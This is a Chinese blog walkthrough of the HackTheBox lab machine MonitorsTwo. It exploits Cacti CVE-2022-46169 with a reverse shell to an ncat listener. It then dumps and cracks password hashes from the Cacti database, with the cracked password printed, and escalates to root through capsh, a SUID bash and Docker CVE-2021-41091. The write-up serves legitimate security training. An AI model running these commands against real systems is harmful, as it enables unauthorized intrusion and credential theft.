HackTheBox-Machines--MonitorsTwo

最新推荐文章于 2024-05-16 13:38:37 发布
最新推荐文章于 2024-05-16 13:38:37 发布
阅读量277 收藏 2
点赞数 7
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box CVE-2022-46169 数据库信息泄漏 CVE-2021-41091 capsh提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/137642021
版权

文章目录

MonitorsTwo 测试过程

0x01 信息收集

   a.端口扫描: 发现22、80端口
   b.信息收集: 1.2.22 Cacti信息收集

nmap -sC -sV 10.129.186.132

在这里插入图片描述

  1.访问 10.129.186.132,为 1.2.22 Cacti 框架的登录页面

在这里插入图片描述

  2.搜索 1.2.22 Cacti 信息,发现在1.2.22版本存在RCE漏洞,编号: CVE-2022-46169

在这里插入图片描述

  CVE-2022-46169 exploit地址https://www.exploit-db.com/exploits/51166

0x02 CVE-2022-46169 漏洞利用

# 设置监听
ncat -lnvp 4444

python3 CVE-2022-46169-CACTI.py -u http://10.129.186.132/ --LHOST=10.10.14.150 --LPORT=4444

在这里插入图片描述

  获取到www-data权限

在这里插入图片描述

0x03 权限提升

  1.主机名为随机的十六进制,猜测可能为docker容器,查看根目录是否有docker配置文件发现.dockernv守护进程配置文件确认为docker容器

在这里插入图片描述

  2.查看 web 目录,检查include/config.php配置文件
在这里插入图片描述

在这里插入图片描述

  发现mysql数据库运行主机、默认数据库、用户名、密码

在这里插入图片描述

  3.数据库连接

mysql -h db -u root -proot cacti

在这里插入图片描述

show tables;

在这里插入图片描述

describe user_auth;

在这里插入图片描述

select username,password from user_auth;

在这里插入图片描述

  4.使用john工具破解hash密码

  获取到账号密码 marcus:funkymonkey
在这里插入图片描述

  5.ssh登录

ssh marcus@10.129.186.132

在这里插入图片描述

0x04 提升到root权限

# 未发现可利用
sudo -l
find / -type f -perm -4000 2>/dev/null
uname -a

在这里插入图片描述

  1.检查docker版本,发现 docker version 20.10.5+dfsg1

docker --version

在这里插入图片描述

  2.搜索docker version 20.10.5 版本相关信息,发现存在漏洞: CVE-2021-41091

在这里插入图片描述

  3.CVE-2021-41091漏洞利用

  找到相关漏洞利用资料https://exploit-notes.hdks.org/exploit/container/docker/moby-docker-engine-privesc/

1> 找到容器挂载目录:

findmnt

在这里插入图片描述

2> 发现两个容器正在运行: 确定哪一个50bca5e748b0容器

# 执行失败
ls /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged/var/www/html

# 执行成功,确定此为Cacti容器
ls /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/var/www/html

在这里插入图片描述

3> 在容器中准备SUID二进制文件

  设置suid二进制文件需要root权限,我们此时权限为www-data权限。

4> 将www-data 提升至 root权限

#检查二进制文件
find / -perm /4000 2>/dev/null

在这里插入图片描述

  利用capsh进行提权

capsh --gid=0 --uid=0 --

在这里插入图片描述

5> 重新设置suid二进制文件

chmod u+s /bin/bash

在这里插入图片描述

6> 在真实主机中执行 SUID 二进制文件

挂载目录/bin/bash -p

/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

在这里插入图片描述

李沉肩
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Prediction-Machines-The-Simple-Economics-of-Artificial-Intelligence
12-25
Prediction-Machines-The-Simple-Economics-of-Artificial-Intelligence
Humanoid Robots. Human-like Machines
09-10
As the world at our time has to face developments like keen climate change and globalisation, one may ask about the significance of building human-like machines, which probably will never operate as ...
Hack the Box Monitors 靶机渗透
Shadow的博客
07-27 412
Monitors靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-27 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 去80端口看看 添加dns echo "10.10.10.238 monitors.htb" >> /etc/hosts 二、web渗透 尝试wpscan,没token的可以去官网注册一个,
HackTheBox系列-MonitorsTwo
qq_43264813的博客
05-25 435
HackTheBox靶机,难度Easy
HackTheBox-Machines--Legacy
七天
03-28 540
Legacy 测试过程。
HackTheBox-Machines--Bank
七天
05-16 270
Bank 测试过程。
finite-state-machines
03-14
有限状态机(Finite State Machines, FSM)是一种...通过实践finite-state-machines-master项目中的代码,你可以掌握如何在Java中有效地构建和管理状态机,这对于处理复杂逻辑问题或者需要动态响应输入的系统特别有用。
cockpit-machines:虚拟机的Cockpit UI
03-25
驾驶舱机器这是虚拟机的用户界面技术领域座舱计算机通过其与libvirt通信。自动发布使用来自动发布版本,该旨在完全自动地将项目发布发布到GitHub,Fedora,Ubuntu,COPR,Docker Hub和其他地方。...
Creating-Virtual-Machines
03-18
arrow_back创建虚拟机化身图像15/15检查点创建实用程序虚拟机 检查我的进度5/5 创建Windows虚拟机 检查我的进度5/5 创建一个自定义虚拟机 检查我的进度5/5 00:35:23注意:在控制台中时,请勿偏离实验室说明。...
前端分析-202307110039
07-29
前端分析-202307110039
Oracle中文基础PPT
07-29
Oracle中文基础PPT 虽然是10g,但是学习Oracle,10g版本没问题 Less01_DB_Architecture_MB3.ppt Less02_Installation_MB3.ppt Less03_DB_DBCA_MB3.ppt Less04_Instance_TB3.ppt Less05_Storage_TB3.ppt Less06_Users_MB3.ppt Less07_Schema_TB3.ppt Less08_Data_TB3.ppt Less09_Undo_TB3.ppt Less10_Security_MB3.ppt Less11_Network_MB3.ppt Less12_ProactiveM_MB3.ppt Less13_Performance_TB3.ppt Less14_BR_Concepts_MB3.ppt Less15_Backups_TB3.ppt Less16_R
【创新未发表】Matlab实现粒子群优化算法PSO-Kmean-Transformer-BiLSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Java项目:基于SSM框架实现的公务员培训机构管理系统【ssm+B/S架构+源码+数据库+开题+任务书+毕业论文】
07-29
一、项目简介 本项目是一套基于SSM框架实现的公务员培训机构管理系统 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.7 后端:spring+springmvc+mybatis+maven+mysql 前端:jsp,css,js 三、系统功能 系统登录角色包括管理员、考生、在职公务员 后台主要功能包括: 个人中心 修改密码 个人信息 在职公务员管理 考生管理 管理员信息 讲师管理 备考课程管理 基础数据管理 单位管理 公告类型管理 课程类型管理 在职培训课程管理 公告管理 轮播图管理等功能 前台主要功能包括: 用户登录 用户注册 首页 备考课程展示 课程详情 立即预订 讲师展示 公告信息 个人中心 备考课程预订 在职培训课程预订 余额充值 在职培训课程 跳转到后台等功能
Auto.js应用管理大师:自动化安装与卸载的艺术
07-29
Auto.js 是一个基于 JavaScript 的自动化脚本工具,主要用于 Android 平台。它允许用户编写脚本来自动执行一系列操作,如模拟点击、滑动、输入文本、读取和设置系统设置等。Auto.js 的目标是简化 Android 设备上的自动化任务,让用户能够通过编写脚本来实现自定义的自动化流程。 以下是 Auto.js 的一些主要特点: 1. **跨平台**:虽然主要针对 Android,但 Auto.js 也可以在其他支持 JavaScript 运行环境的平台上使用。 2. **易学易用**:如果你熟悉 JavaScript,那么学习 Auto.js 会相对容易,因为它使用类似的语法。 3. **丰富的API**:Auto.js 提供了丰富的 API,可以访问设备的许多功能,如文件系统、剪贴板、通知、网络等。 4. **社区支持**:Auto.js 拥有一个活跃的社区,用户可以在社区中分享脚本、解决问题和获取帮助。 5. **可扩展性**:用户可以根据自己的需要编写和分享自定义模块,以扩展 Auto.js 的功能。 6. **自动化任务**:Auto.js 可以用来自动化
单片机控制的节水灌溉系统的研究
07-29
自动控制节水灌溉技术的高低代表着农业现代化的发展状况,灌溉系统自动化水平较低是制约我国高效农业发展的主要原因。本文就此问题研究了单片机控制的滴灌节水灌溉系统,该系统可对不同土壤的湿度进行监控,并按照作物对土壤湿度的要求进行适时、适量灌水,其核心是单片机和PC机构成的控制部分,主要对土壤湿度与灌水量之间的关系、灌溉控制技术及设备系统的硬件、软件编程各个部分进行了深入的研究。 单片机控制部分采用上下位机的形式。下位机硬件部分选用AT89C51单片机为核心,主要由土壤湿度传感器,信号处理电路,显示电路,输出控制电路,故障报警电路等组成,软件选用汇编语言编程。上位机选用586型以上PC机,通过MAX232芯片实现同下位机的电平转换功能,上下位机之间通过串行通信方式进行数据的双向传输,软件选用VB高级编程语言以建立友好的人机界面。系统主要具有以下功能:可在PC机提供的人机对话界面上设置作物要求的土壤湿度相关参数;单片机可将土壤湿度传感器检测到的土壤湿度模拟量转换成数字量,显示于LED显示器上,同时单片机可采用串行通信方式将此湿度值传输到PC机上;PC机通过其内设程序计算出所需的灌水量和灌水时间,且显示于界面上,并将有关的灌水信息反馈给单片机,若需灌水,则单片机系统启动鸣音报警,发出灌水信号,并经放大驱动设备,开启电磁阀进行倒计时定时灌水,若不需灌水,即PC机上显示的灌水量和灌水时间均为0,系统不进行灌水。
人工蜂群算法(ABC)优化支持向量机的数据分类预测,ABC-SVM分类预测,多变量输入模型 多特征输入单输出的二分类及多分类
07-29
人工蜂群算法(ABC)优化支持向量机的数据分类预测,ABC-SVM分类预测,多变量输入模型。 多特征输入单输出的二分类及多分类模型。程序内注释详细,直接替换数据就可以用。 程序语言为matlab,程序可出分类效果图,迭代优化图,混淆矩阵图。
基于 python 的航空发动机燃油热管理仿真软件开发
最新发布
07-29
针对航空发动机综合热管理系统不断提升的仿真需求,利用 T[6AF. 编程语言开发了航空发 动机燃油热管理仿真软件!首先,基于工程热力学和流体力学原理,建立了常见燃油系统部件 ( 如管路"泵和换热器等) 的数学模型!其次,采用 T[d6 库进行了图形用户界面的设计,包括组件 区"仿真区和计算显示区等; 同时建立了 ROH^A,E- Q,@C 仿真框架,并设计了元件类和线条类分别 表示部件及其关系,实现了对燃油系统的交互式仿真; 此外,建立代表部件数学模型的计算类以 进行数值仿真计算!最后,搭建了简化的燃油回路模型并进行仿真分析,验证了软件的有效性!
Protues51单片机LED灯闪烁程序与仿真
07-29
Protues51单片机LED灯闪烁程序与仿真
【创新未发表】Matlab实现布谷鸟优化算法CS-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值